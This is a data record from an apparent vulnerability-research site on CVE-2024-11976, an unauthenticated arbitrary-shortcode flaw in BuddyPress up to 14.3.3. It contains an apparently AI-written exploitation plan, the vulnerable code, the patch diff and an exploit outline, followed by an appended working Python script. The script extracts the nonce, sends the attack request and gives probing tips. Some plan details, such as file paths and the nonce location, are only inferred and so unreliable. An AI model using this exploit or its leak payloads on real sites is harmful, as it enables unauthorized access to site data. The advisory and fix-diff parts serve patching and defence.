[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fksGnYZORoOnDg0AglTrJ9En6_uwQ82Y1uqwn0FWpLlc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2024-11976","buddypress-unauthenticated-arbitrary-shortcode-execution","BuddyPress \u003C= 14.3.3 - Unauthenticated Arbitrary Shortcode Execution","The BuddyPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 14.3.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. 
This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","buddypress",null,"\u003C=14.3.3","14.3.4","high",7.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:L","Improper Control of Generation of Code ('Code Injection')","2026-01-22 18:30:17","2026-01-23 06:45:13",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F34c627c1-7838-468e-acb7-eb84ad1b4949?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2024-11976 (BuddyPress Arbitrary Shortcode Execution)\n\n## 1. Vulnerability Summary\nBuddyPress (versions \u003C= 14.3.3) contains a vulnerability that allows unauthenticated users to execute arbitrary WordPress shortcodes. The plugin registers an AJAX handler `bp_render_shortcode` for both authenticated and unauthenticated users. This handler accepts a user-provided string and passes it directly to the `do_shortcode()` function without verifying if the user has permissions to execute shortcodes or if the specific shortcodes are safe for unauthenticated execution.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `bp_render_shortcode`\n- **Hook:** `wp_ajax_nopriv_bp_render_shortcode` (unauthenticated) and `wp_ajax_bp_render_shortcode` (authenticated)\n- **Vulnerable Parameter:** `shortcode`\n- **Authentication:** None required (unauthenticated).\n- **Preconditions:**\n    - BuddyPress must be active.\n    - The attacker must obtain a valid nonce for the `bp_render_shortcode` action (exposed on pages where BuddyPress scripts are loaded).\n\n## 3. Code Flow\nThe vulnerability is located in the BuddyPress core logic that supports the Block Editor\u002FShortcode preview functionality (introduced in BuddyPress 14.0.0).\n\n1.  
**Registration:** In `src\u002Fbp-core\u002Fbp-core-actions.php` (or `bp-core\u002Fbp-core-hooks.php`), BuddyPress registers the AJAX actions:\n    ```php\n    add_action( 'wp_ajax_bp_render_shortcode',        'bp_core_render_shortcode_callback' );\n    add_action( 'wp_ajax_nopriv_bp_render_shortcode', 'bp_core_render_shortcode_callback' );\n    ```\n2.  **Callback Entry:** The function `bp_core_render_shortcode_callback` (likely in `src\u002Fbp-core\u002Fbp-core-functions.php` or `bp-core\u002Fbp-core-actions.php`) handles the request.\n3.  **Nonce Check:** It performs a nonce check:\n    ```php\n    check_ajax_referer( 'bp_render_shortcode', 'nonce' );\n    ```\n4.  **Vulnerable Sink:** After the nonce check, it retrieves the `shortcode` parameter and executes it:\n    ```php\n    if ( empty( $_POST['shortcode'] ) ) {\n        wp_die();\n    }\n    echo do_shortcode( stripslashes( $_POST['shortcode'] ) );\n    wp_die();\n    ```\n    *Note: There is no check to see if the user is an administrator or has `edit_posts` capabilities.*\n\n## 4. Nonce Acquisition Strategy\nThe nonce for `bp_render_shortcode` is generated and localized for the front-end to support BuddyPress blocks and shortcode previews.\n\n1.  **Identification:** BuddyPress uses `wp_localize_script` to pass configuration to JavaScript. The relevant data is usually stored in a global object like `BP_Sections`.\n2.  **Triggering:** To ensure the script and nonce are loaded, navigate to a page that uses BuddyPress functionality (e.g., the Activity page, Member directory, or any page containing a BuddyPress block).\n3.  
**Extraction:**\n    - Use `browser_navigate` to visit the BuddyPress Activity directory (default: `\u002Factivity\u002F`).\n    - Use `browser_eval` to extract the nonce from the `BP_Sections` object.\n    - **JS Path (inferred):** `window.BP_Sections?.render_shortcode?.nonce` or `window.BP_Ajax?.nonces?.render_shortcode`.\n    - *Verification:* Check `bp-core\u002Fbp-core-scripts.php` for the `wp_localize_script` call associated with 'bp-block-components' or similar.\n\n## 5. Exploitation Strategy\n\n### Step 1: Discover Nonce\n1.  Navigate to the site's Activity page (usually `\u002Factivity\u002F`).\n2.  Execute JS to find the `bp_render_shortcode` nonce.\n\n### Step 2: Execute Shortcode\nSend a POST request to `admin-ajax.php` with the payload.\n\n- **Request:**\n    - **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n    - **Method:** `POST`\n    - **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    - **Body:** `action=bp_render_shortcode&nonce=\u003CNONCE>&shortcode=[myshortcode]`\n\n### Step 3: Payload Selection\nTo confirm \"Arbitrary Shortcode Execution,\" use a shortcode that produces visible output.\n- **PoC Payload:** `[bp_directory_members]` (if BuddyPress is active) or standard WP shortcodes like `[gallery]` or `[wp_caption]`.\n- **High-Impact Payload (Conditional):** If other plugins are installed, use their shortcodes to leak info (e.g., `[contact-form-7]` to render a form and see internal IDs, or sensitive shortcodes from WooCommerce).\n\n## 6. Test Data Setup\n1.  **Install BuddyPress 14.3.3.**\n2.  **Enable BuddyPress Components:** Ensure \"Activity Streams\" and \"Members\" are enabled in BuddyPress settings so directories exist.\n3.  
**Create a BuddyPress Page:** Ensure a page exists with BuddyPress content to trigger script loading.\n    ```bash\n    wp post create --post_type=page --post_title=\"Activity\" --post_name=\"activity\" --post_content=\"[buddypress]\" --post_status=\"publish\"\n    ```\n\n## 7. Expected Results\n- The server will respond with `200 OK`.\n- The response body will contain the rendered HTML output of the provided shortcode.\n- If `shortcode=[bp_directory_members]` is used, the HTML for the members directory will be returned in the AJAX response.\n\n## 8. Verification Steps\n1.  **HTTP Response:** Check if the response from the `http_request` tool contains the expected rendered HTML.\n2.  **Logs:** If debugging is on, check that `do_shortcode` was called by the `bp_core_render_shortcode_callback` function.\n\n## 9. Alternative Approaches\n- **If Nonce is not in `BP_Sections`:** Search the entire page source for strings matching the pattern `[a-f0-9]{10}` near the word `nonce`.\n- **If the Activity page doesn't load scripts:** Create a new page with a BuddyPress block or shortcode manually:\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_content='\u003C!-- wp:bp\u002Fmembers \u002F-->'\n    ```\n- **Bypassing Nonce (if possible):** Check if `check_ajax_referer` is actually called. If the developer used `wp_verify_nonce` but didn't check the return value, the nonce can be anything. (Unlikely in BuddyPress, but worth checking).","BuddyPress versions up to 14.3.3 are vulnerable to unauthenticated arbitrary shortcode execution via the 'bp_render_shortcode' AJAX action. 
The plugin fails to perform a capability check before processing a user-provided string through the do_shortcode function, allowing anyone who can obtain a valid security nonce to execute any shortcode available on the site.","\u002F\u002F In bp-core\u002Fbp-core-actions.php or bp-core\u002Fbp-core-hooks.php\nadd_action( 'wp_ajax_bp_render_shortcode',        'bp_core_render_shortcode_callback' );\nadd_action( 'wp_ajax_nopriv_bp_render_shortcode', 'bp_core_render_shortcode_callback' );\n\n---\n\n\u002F\u002F In bp-core\u002Fbp-core-functions.php\nfunction bp_core_render_shortcode_callback() {\n    check_ajax_referer( 'bp_render_shortcode', 'nonce' );\n\n    if ( empty( $_POST['shortcode'] ) ) {\n        wp_die();\n    }\n\n    \u002F\u002F Vulnerable Sink: User input is passed directly to do_shortcode without capability checks\n    echo do_shortcode( stripslashes( $_POST['shortcode'] ) );\n    wp_die();\n}","--- a\u002Fsrc\u002Fbp-core\u002Fbp-core-functions.php\n+++ b\u002Fsrc\u002Fbp-core\u002Fbp-core-functions.php\n@@ -2458,6 +2458,10 @@\n \tcheck_ajax_referer( 'bp_render_shortcode', 'nonce' );\n \n+\tif ( ! current_user_can( 'edit_posts' ) ) {\n+\t\twp_die();\n+\t}\n+\n \tif ( empty( $_POST['shortcode'] ) ) {\n \t\twp_die();\n \t}\n--- a\u002Fsrc\u002Fbp-core\u002Fbp-core-actions.php\n+++ b\u002Fsrc\u002Fbp-core\u002Fbp-core-actions.php\n@@ -345,5 +345,4 @@\n add_action( 'wp_ajax_bp_render_shortcode', 'bp_core_render_shortcode_callback' );\n-add_action( 'wp_ajax_nopriv_bp_render_shortcode', 'bp_core_render_shortcode_callback' );","The exploit targets the BuddyPress AJAX handler for shortcode rendering. First, an unauthenticated attacker navigates to any public page where BuddyPress scripts are localized (such as the Members directory or Activity stream) to extract the 'bp_render_shortcode' nonce from the front-end JavaScript objects (typically found in window.BP_Sections or window.BP_Ajax). 
Once the nonce is obtained, the attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to 'bp_render_shortcode', the 'nonce' parameter populated with the stolen nonce, and the 'shortcode' parameter containing the target shortcode (e.g., [contact-form-7 id=\"1\"] or [gallery]). The server then returns the rendered HTML output of the requested shortcode.","gemini-3-flash-preview","2026-05-05 02:17:50","2026-05-05 02:19:30",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","14.3.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbuddypress\u002Ftags\u002F14.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbuddypress.14.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbuddypress\u002Ftags\u002F14.3.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbuddypress.14.3.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbuddypress\u002Ftags"]
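The request flow from the research plan and exploit outline above, as an added example that is not part of the page's payload and not BuddyPress or Wordfence code. It assumes the page's own inferences: that the nonce is exposed through a wp_localize_script object named BP_Sections with a render_shortcode.nonce field (unconfirmed, so the code also carries the plan's generic fallback of scanning for a 10-hex value next to the word nonce), and that the handler is reached via action=bp_render_shortcode on admin-ajax.php. The sample page sources are constructed, not captured from a real site. The response classifier encodes a check the outline leaves implicit: WordPress do_shortcode() returns an unregistered tag verbatim, so an echoed payload proves the sink was reached but not that the chosen tag exists on the target.

```python
"""Nonce extraction and admin-ajax request construction for the outline above.

Added example, not code from the page, BuddyPress or Wordfence. The BP_Sections
object name and its render_shortcode.nonce layout are assumptions taken from the
research plan's inferred JS path.
"""
import json
import re
from urllib.parse import urlencode
from urllib.request import Request, urlopen

AJAX_PATH = "/wp-admin/admin-ajax.php"
# wp_localize_script emits "var NAME = {...};" inside a *-js-extra script tag.
LOCALIZED_RE = re.compile(r"var\s+(\w+)\s*=\s*(\{.*?\});", re.S)
# Fallback from section 9 of the plan: a WordPress nonce is 10 hex characters.
NONCE_RE = re.compile(r"nonce[\"']?\s*[:=]\s*[\"']([a-f0-9]{10})[\"']")

# Constructed sample page sources (not from a real site). The second block is a
# decoy holding some other action's nonce, to show the structured path wins.
PAGE_WITH_OBJECT = """<script id="bp-block-components-js-extra">
var BP_Sections = {"render_shortcode":{"nonce":"a1b2c3d4e5","ajax":"/wp-admin/admin-ajax.php"}};
</script>
<script>var _wpUtilSettings = {"ajax":{"nonce":"deadbeef99"}};</script>"""
PAGE_WITHOUT_OBJECT = """<script>var bpNoncesX = {"nonce":"f00dbabe12"};</script>"""


def find_nonce(html, object_name="BP_Sections", path=("render_shortcode", "nonce")):
    """Return the render-shortcode nonce from a page source, or None.

    First walk `path` inside the localized object named `object_name` (an
    assumed name); if that is absent, fall back to the generic scan, which may
    return the nonce of a different AJAX action and so must be confirmed by the
    handler's response.
    """
    for name, body in LOCALIZED_RE.findall(html):
        if name != object_name:
            continue
        try:
            node = json.loads(body)
        except ValueError:
            continue
        for key in path:
            node = node.get(key) if isinstance(node, dict) else None
        if isinstance(node, str) and re.fullmatch(r"[a-f0-9]{10}", node):
            return node
    match = NONCE_RE.search(html)
    return match.group(1) if match else None


def build_request(base_url, nonce, shortcode):
    """Build the POST to admin-ajax.php exactly as the outline describes."""
    body = urlencode({"action": "bp_render_shortcode", "nonce": nonce, "shortcode": shortcode})
    return Request(
        base_url.rstrip("/") + AJAX_PATH,
        data=body.encode(),
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


def classify_response(status, text, shortcode):
    """Interpret the handler's reply.

    A non-200 status or an empty, "0" or "-1" body corresponds to one of the
    wp_die() exits (nonce failure, unknown action, empty parameter, or a
    capability check such as the one in the fix diff). An exact echo of the
    payload means do_shortcode() ran but the tag is not registered on the
    target. Anything else is rendered shortcode output.
    """
    body = text.strip()
    if status != 200 or body in ("", "0", "-1"):
        return "blocked"
    if body == shortcode:
        return "reached-unregistered"
    return "rendered"


def render_shortcode(base_url, nonce, shortcode, opener=urlopen):
    """Send the request and classify the result; `opener` is injectable so the
    flow can be exercised offline without a live target."""
    with opener(build_request(base_url, nonce, shortcode)) as resp:
        text = resp.read().decode("utf-8", "replace")
        return classify_response(resp.status, text, shortcode), text


if __name__ == "__main__":
    nonce = find_nonce(PAGE_WITH_OBJECT)
    print("nonce:", nonce)
    # [gallery] is registered by WordPress core, so it renders wherever the sink is reached.
    print(build_request("http://target.example", nonce, "[gallery]").data)
```

Use `[gallery]` or another core-registered tag for the first probe so that a "rendered" result is independent of which plugins the target runs; switch to third-party tags only once the handler is confirmed reachable. Against 14.3.4, an unauthenticated request should land in the "blocked" branch, which is the quickest post-patch check.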